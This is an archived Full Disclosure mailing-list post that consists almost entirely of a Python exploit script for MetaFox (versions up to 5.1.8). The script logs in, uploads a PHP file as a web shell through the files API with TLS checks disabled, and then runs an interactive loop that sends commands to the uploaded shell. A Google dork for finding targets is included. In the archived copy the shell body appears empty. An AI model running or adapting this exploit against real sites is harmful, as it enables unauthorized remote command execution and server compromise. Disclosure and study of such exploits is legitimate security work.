[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[FD] MetaFox Remote Shell Upload Exploit
- To: fulldisclosure@xxxxxxxxxxxx
- Subject: [FD] MetaFox Remote Shell Upload Exploit
- From: "j0ck1ng@tempr.email" <j0ck1ng@tempr.email>
- Date: Wed, 6 Mar 2024 11:20:33 +0100
#!/usr/bin/env python3# Exploit Title: MetaFox Remote Shell Upload# Google
Dork: "Social network for niche communities"# Exploit Author: The Joker# Vendor
Homepage: https://www.phpfox.com# Version: <= 5.1.8import jsonimport
requestsimport sysif len(sys.argv) != 4: sys.exit("Usage: %s " % sys.argv[0])
requests.packages.urllib3.disable_warnings()endpoint = sys.argv[1] +
"/api/v1/user/login"response = requests.post(endpoint, json={"username":
sys.argv[2], "password": sys.argv[3]}, verify=False)json_response =
json.loads(response.text)if not "access_token" in json_response:
sys.exit("Login failed!")print("Login success! Uploading shell")token =
json_response["access_token"]endpoint = sys.argv[1] + "/api/v1/files"files =
{"file[0]": ("wtf.php", "")}response = requests.post(endpoint, files=files,
headers={"Authorization": "Bearer " + token}, verify=False)json_response =
json.loads(response.text)if not "data" in json_response or not "url" in
json_response["data"][0]: sys.exit("Upload failed!")shell_url =
json_response["data"][0]["url"]print("Shell uploaded at %s\n" % shell_url)while
True: command = input("$ ") response = requests.post(shell_url,
data={"command": command}, verify=False) print(response.text)
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/